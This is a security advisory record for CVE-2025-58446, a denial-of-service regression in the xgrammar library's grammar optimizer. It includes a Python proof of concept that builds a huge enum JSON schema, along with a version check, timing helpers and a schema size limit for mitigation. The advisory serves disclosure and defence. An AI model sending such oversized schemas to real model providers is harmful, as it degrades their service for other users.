ghsa-9q5r-wfvf-rr7f
Vulnerability from github
Published
2025-09-05 21:10
Modified
2025-09-10 20:51
Summary
xgrammar vulnerable to denial of service by huge enum grammar
Details

Summary

The provided grammar fits in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this appears to be a regression caused by the Earley parser.

Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and parsing the grammar took significantly longer (with the models I checked) than the LLM processing itself, meaning this can be used to mount a denial-of-service (DoS) attack against model providers.
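To get a feel for the input size involved, the following sketch computes the serialized length of the enum that the PoC generates with its default parameters (10000 random strings of 10 uppercase letters). The helper names `enum_values` and `expected_length` are hypothetical and only used for illustration. It measures the JSON enum, not the grammar that xgrammar derives from it, so it is only a rough indication of scale relative to the ">100k characters" figure in the Patch section.

```python
import json
import random
import string


def enum_values(size=10000, str_len=10):
    """Build the same kind of random enum values as the PoC."""
    return [
        "".join(random.choices(string.ascii_uppercase, k=str_len))
        for _ in range(size)
    ]


def expected_length(size, str_len):
    """Length of json.dumps(list_of_strings) for size >= 1 ASCII strings.

    Each element costs str_len characters plus two quotes, elements are
    joined with ", " (two characters), and the list adds two brackets.
    """
    return size * (str_len + 2) + (size - 1) * 2 + 2


serialized = json.dumps(enum_values())
print(len(serialized), expected_length(10000, 10))
```

With the PoC defaults the enum alone serializes to 140000 characters, before the surrounding object schema is added.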

Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solves this problem by speeding up the grammar optimizer and disabling some slow optimizations for large grammars.

Thanks to @Seven-Streams
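A deployment can check whether its installed xgrammar falls in the affected range stated in this advisory (introduced in 0.1.23, fixed in 0.1.24). The sketch below uses only the standard library. The function names are hypothetical, and the version parsing is deliberately simplistic: it looks only at the leading numeric components and ignores pre-release or local suffixes.

```python
import re
from importlib import metadata

AFFECTED_FROM = (0, 1, 23)  # "introduced" version from the advisory
FIXED_IN = (0, 1, 24)       # "fixed" version from the advisory


def parse_version(text):
    """Return the leading numeric components of a version string as a tuple."""
    match = re.match(r"\d+(?:\.\d+)*", text)
    if match is None:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version_text):
    """True if the version lies in [AFFECTED_FROM, FIXED_IN)."""
    return AFFECTED_FROM <= parse_version(version_text) < FIXED_IN


def installed_xgrammar_is_affected():
    """Check the installed xgrammar distribution, if there is one."""
    try:
        return is_affected(metadata.version("xgrammar"))
    except metadata.PackageNotFoundError:
        return False  # xgrammar is not installed in this environment


print(installed_xgrammar_is_affected())
```

If the check reports an affected version, upgrading to 0.1.24 or later is the remedy described above.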

PoC

```
import string
import random

def enum_schema(size=10000, str_len=10):
    # Enum of `size` random uppercase strings, each `str_len` characters long.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {
            "colorEnum": enum
        },
        "type": "object",
        "properties": {
            "color1": {
                "$ref": "#/definitions/colorEnum"
            },
            "color2": {
                "$ref": "#/definitions/colorEnum"
            },
            "color3": {
                "$ref": "#/definitions/colorEnum"
            },
            "color4": {
                "$ref": "#/definitions/colorEnum"
            },
            "color5": {
                "$ref": "#/definitions/colorEnum"
            },
            "color6": {
                "$ref": "#/definitions/colorEnum"
            },
            "color7": {
                "$ref": "#/definitions/colorEnum"
            },
            "color8": {
                "$ref": "#/definitions/colorEnum"
            }
        },
        "required": [
            "color1",
            "color2"
        ]
    }
    return schema

schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where:

```
import json
import xgrammar as xgr
# Assumption: the original snippet omits its imports; this helper is taken
# to be the one shipped in xgrammar.testing.
from xgrammar.testing import _is_grammar_accept_string

def test_schema(schema, instance):
    # Building the grammar from the schema is the slow step in 0.1.23.
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```
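To quantify the slowdown rather than just observe it, the grammar construction can be wrapped in a wall-clock timer. This is a minimal sketch: `timed` and `time_grammar_build` are hypothetical helpers, and the only xgrammar call used is `xgr.Grammar.from_json_schema` as it appears in the PoC. xgrammar is imported lazily so the timer itself can be used without it.

```python
import json
import time


def timed(fn, *args, **kwargs):
    """Call fn and return (result, elapsed_seconds)."""
    start = time.perf_counter()
    result = fn(*args, **kwargs)
    return result, time.perf_counter() - start


def time_grammar_build(schema):
    """Time the schema-to-grammar step used in the PoC."""
    import xgrammar as xgr  # imported here so `timed` works without xgrammar

    return timed(
        xgr.Grammar.from_json_schema,
        json.dumps(schema),
        strict_mode=True,
    )


# Usage with the PoC schema (requires xgrammar to be installed):
#   _, seconds = time_grammar_build(enum_schema())
#   print(f"grammar build took {seconds:.1f}s")
```

Comparing the measured time across versions (for example 0.1.23 and 0.1.24) is one way to confirm that an upgrade actually removed the regression in a given environment.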

Impact

Denial of service (DoS).
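For services that accept JSON schemas from untrusted clients, a size budget checked before grammar construction can serve as defense in depth alongside the upgrade. The sketch below is an assumption-laden illustration, not part of xgrammar: the limits `MAX_SCHEMA_CHARS` and `MAX_ENUM_VALUES`, the `SchemaTooLarge` exception, and the function names are all hypothetical and would need tuning for a real workload.

```python
import json

MAX_SCHEMA_CHARS = 50_000  # hypothetical limit on the serialized schema size
MAX_ENUM_VALUES = 1_000    # hypothetical limit on values in a single enum


class SchemaTooLarge(ValueError):
    """Raised when a schema exceeds the configured budget."""


def iter_enums(node):
    """Yield every list found under an "enum" key anywhere in the schema."""
    if isinstance(node, dict):
        enum = node.get("enum")
        if isinstance(enum, list):
            yield enum
        for value in node.values():
            yield from iter_enums(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_enums(item)


def check_schema_budget(schema, max_chars=MAX_SCHEMA_CHARS,
                        max_enum_values=MAX_ENUM_VALUES):
    """Return the serialized size, or raise SchemaTooLarge."""
    size = len(json.dumps(schema))
    if size > max_chars:
        raise SchemaTooLarge(f"schema is {size} characters, limit is {max_chars}")
    for enum in iter_enums(schema):
        if len(enum) > max_enum_values:
            raise SchemaTooLarge(
                f"enum has {len(enum)} values, limit is {max_enum_values}"
            )
    return size
```

Calling `check_schema_budget(schema)` before passing the schema to the grammar builder rejects inputs like the PoC's 10000-value enum without spending time on grammar construction.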



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "xgrammar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.23"
            },
            {
              "fixed": "0.1.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.23"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T21:10:06Z",
    "nvd_published_at": "2025-09-06T19:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nProvided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.\n\n### Details\n\nFull reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.\n\n### Patch\n\nThis problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (\u003e100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. \n\nThanks to @Seven-Streams \n\n### PoC\n```\nimport string\nimport random\n\ndef enum_schema(size=10000,str_len=10):\n    enum =  {\"enum\": [\"\".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}\n    schema = {\n        \"definitions\": {\n            \"colorEnum\": enum\n        },\n        \"type\": \"object\",\n        \"properties\": {\n            \"color1\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color2\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color3\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color4\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color5\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color6\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color7\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color8\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            }\n        },\n        \"required\": [\n                \"color1\",\n                \"color2\"\n         ]\n    }\n    return schema\n\nschema_enum = enum_schema()\nprint(schema_enum)\nprint(test_schema(schema_enum, {}))\n```\n\nwhere:\n```\ndef test_schema(schema, instance):\n    grammar = xgr.Grammar.from_json_schema(\n        json.dumps(schema),\n        strict_mode=True\n    )\n    return _is_grammar_accept_string(grammar, json.dumps(instance))\n```\n\n### Impact\nDOS",
  "id": "GHSA-9q5r-wfvf-rr7f",
  "modified": "2025-09-10T20:51:27Z",
  "published": "2025-09-05T21:10:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mlc-ai/xgrammar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xgrammar vulnerable to denial of service by huge enum grammar"
}

